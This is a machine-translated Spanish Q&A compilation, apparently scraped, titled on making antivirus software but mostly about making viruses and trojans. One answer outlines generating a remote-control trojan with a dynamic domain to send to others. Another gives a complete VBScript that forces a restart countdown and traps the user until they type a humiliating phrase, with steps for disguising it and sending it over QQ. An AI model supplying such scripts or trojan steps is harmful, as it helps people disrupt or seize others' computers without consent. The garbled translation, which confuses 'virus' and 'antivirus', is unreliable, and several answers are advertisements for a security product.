Red de conocimiento informático - Descarga de software - Cómo crear software antivirus

Cómo crear software antivirus

Pregunta 1: Quiero crear un virus troyano sencillo ¿Cómo hacerlo y qué software utilizar? Esto requiere el uso de un software de control remoto, como Gray Pigeon, etc. Con este software de control remoto, debe tener su propio nombre de dominio dinámico y luego usar el nombre de dominio dinámico para generar un virus troyano en el software de control remoto. para que puedas enviárselo a otras personas. Después de que alguien sea infectado por un virus troyano, su computadora quedará completamente controlada y podrás reiniciarla, apagarla, etc. Sin embargo, te aconsejo que abandones esta idea, incluso si ya la tienes. software de control remoto y genera con éxito un troyano. La razón por la que los virus no pueden tener ningún efecto cuando se envían a otros es que los virus troyanos no son software antivirus. El software antivirus actual no es vegetariano. software antivirus a otros, el software antivirus los eliminará inmediatamente y no tendrá ningún efecto. Lo más importante es que si el virus que usted crea es anti-kill, el software antivirus de la otra parte no puede detectarlo como un virus. Está bien, pero no se haga ilusiones. Nunca habrá control remoto anti-kill en Internet. Algunos incluyen virus de puerta trasera bajo el nombre. Imagínese el arduo trabajo de otros. ¿Se entrega fácilmente a otros o se publica en línea? Además, es mejor no publicar virus antivirus en línea; de lo contrario, si publica un virus que puede ser antivirus durante aproximadamente una semana, probablemente desaparecerá al día siguiente. Lo escribí a mano y lo encontré útil. ¡¡Por favor acéptelo.

Pregunta 2: Cómo crear software antivirus usted mismo en 30 minutos. Primero aprenda a programar y luego estudie cómo crear virus.

Pregunta 3: Cómo crearlo. un virus informático El método es el siguiente: Haga clic en Ejecutar en Inicio e ingrese en xx: xx apagado -s, xx: xx representa el momento en que se debe apagar la máquina. Ingrese Shutdown.exe -s -t xx. representa el número de segundos para apagar. Si desea cancelar, ingrese apagado -a para cancelar.

Escuché de un amigo que alguien le envió algo. Él lo miró. . Dice que desea ingresar una oración. . De lo contrario, déjalo en paz. ¿Cómo se compila? . . Conozco el comando de apagado y el comando de cancelación. . . No sé cómo cancelar el pedido si la otra parte pierde. .

Script, como el siguiente. Se puede lograr.

1.

Primero, creamos una nueva carpeta en el escritorio y la abrimos Buscar - Herramientas T - Opciones de carpeta O - Ver

Ocultar extensiones para tipos de archivos conocidos Desmarque la marca anterior. /p>

Luego comenzamos a crear un bloc de notas en el escritorio y luego copiamos el siguiente código en él

en caso de error, reanudar a continuación

dim WSHshellA

set WSHshellA = wscript.createobject(wscript.shell)

WSHshellA.run cmd.exe /c Shutdown -r -t 60 -c Di que soy un cerdo, no digas que lo soy El cerdo apagará tu teléfono en solo un minuto. Si no lo crees, inténtalo, 0, verdadero

tenue a

do while(a Soy un cerdo. )

a = inputbox (Si dices que soy un cerdo, no apagues el teléfono, date prisa, di que soy un cerdo, no lo digas, no lo digas , 8000, 7000)

msgbox chr(13) chr(13) chr(13) a, 0, MsgBox

bucle

msgbox chr(13) chr(13) chr(13) Solo dilo antes, jaja, cerdo

dim WSHshell

set WSHshell = wscript.createobject(wscript.shell)

WSHshell.run cmd.exe /c apagado -a, 0, true

msgbox chr (13) chr(13) chr(13) Jajajaja, qué divertido

Después de copiar, cambie el sufijo a .vbs o cambie el método de apertura a aplicación, para que pueda comprimirlo y enviarlo a QQ. Su amigo, la otra persona tiene que apagar la computadora dentro de los 60 segundos posteriores a encenderla

Ni siquiera puede completar la tarea. Sólo puede resolver el problema diciendo que es un cerdo. ¿Suficientemente malo? Nota: puedes cambiar "Soy un cerdo" por lo que quieras.

Si quieres tratar con la persona que te gusta,

cámbialo por "Te amo". para que solo pueda decir "te amo". No tienes que apagar la computadora más tarde, también puedes cambiar la hora a 20, lo que significa que si enciendes la computadora durante 20 segundos, luego la apagas. Si apaga la computadora antes de que la otra parte haya terminado de escribir, ¿se deprime mucho?

El segundo paso es escribir un script VBS

En primer lugar. , puedes mirar lo siguiente

WScript.Echo (Oye, gracias por abrirme, ¡te he estado esperando durante mucho tiempo! & TSName)

WScript. Echo (¿Eres un niño lindo?)

WScript.Echo (Ja, te extraño, ¿no lo sabes?)

WScript.Echo(¿Por qué estás aquí? ¿Quieres decir que no te importo?)

WScript.Echo (Eh, estoy tan enojado. Te he estado esperando durante tanto tiempo y mi corazón se ha helado).

WScript.Echo(Xiaoqiang está muy enojado,...gt;gt;

Pregunta 4: ¿Cómo se crea un virus? Un virus es un archivo de programa,

Obtenido escribiendo código a través de programación en lenguaje C

Algunos virus son muy poderosos. Se recomienda que el cartel utilice Tencent Computer Manager para proteger la seguridad de la computadora de manera más confiable.

Tencent Computer Manager es un software antivirus.

El primer producto de China que responde a la corriente principal internacional e integra funciones de gestión antivirus.

La administración antivirus dos en uno de Tencent Computer Manager, la protección en tiempo real de 16 capas y los cuatro principales motores de búsqueda de virus, incluidos Xiaohongsan y Kingsoft, pueden interceptar sitios web de phishing y virus troyanos de manera oportuna. .

El anfitrión también puede utilizar el mayordomo para iniciar sesión en la cuenta Tencent, lo que no solo puede proteger su cuenta sino también acelerarla y recibir paquetes de regalo de juegos. Ocupa menos recursos y no afecta la oficina ni el entretenimiento del propietario.

Pregunta 5: ¿Cómo hacer un virus informático? ¿Sabes programación? ! ¿Conoce C, VC, JAVA, VB y otros lenguajes ensambladores? Si no, ¿por qué está gritando? No siempre piense en piratear las computadoras de otras personas. Primero, vea si su propia computadora ha sido pirateada.

Pregunta 6: ¿Cómo descargar software de creación de virus? Es mejor no hacer esto. Está prohibido en el país. Si la policía de Internet detecta este tipo de comportamiento, se le imputarán responsabilidades penales.

Pregunta 7: Cómo crear un virus troyano. ¿Sabes programación informática? De hecho, los llamados virus troyanos también son programas ilegales. Si no sabes programar, estás tocando el piano para tu beneficio. No dañes a otros. ¡Para crear un caballo de Troya en tu vida, para que puedas vivir unos años más y vivir una larga vida! (¡Consejo!)

Pregunta 8: ¿Cómo se fabrica el software antivirus? Esto es realmente difícil de decir

El software antivirus es similar al software normal y los métodos son los mismos

Lo más importante es la base de datos de virus, para comprender cada virus

Trabajo muy agotador

En cuanto al desarrollo de software antivirus, no soy un profesional y no puedo ayudarte

zhidao.baidu/question/99290036

Millones de bases de datos de virus, sólo piense cuántos años tomará...

Pregunta 9: Cómo hacer un programa troyano sencillo Hola

1. Haga una El caballo de Troya y su uso como virus troyano son actos ilegales y delictivos, y no se recomienda estudiarlos.

2. Después de crear un programa de virus troyano, este programa comenzará a ejecutarse automáticamente. Primero robará los troyanos de la cuenta y destruirá los programas de su computadora.

3. Por lo tanto, si eres atacado o te roban tu cuenta, no utilices este método y resuélvelo por medios legítimos.

4. Se recomienda descargar un administrador de computadora desde el sitio web oficial de Tencent Computer Manager.

5. Computer Manager tiene 16 capas de funciones de protección en tiempo real y un sistema de defensa panorámica de cuenta QQ, que puede proteger la seguridad informática de los virus troyanos en todos los aspectos, desde la seguridad de Internet, la entrada de aplicaciones, la capa inferior del sistema, etc., y Computer Manager también puede proteger la seguridad de la cuenta en todos los aspectos y dimensiones, combatir con precisión los troyanos que roban cuentas, eliminar instantáneamente y advertir sobre riesgos.

Si tiene otras preguntas o problemas, visite Computer Manager Enterprise Platform para hacer preguntas nuevamente y haremos todo lo posible para responderlas.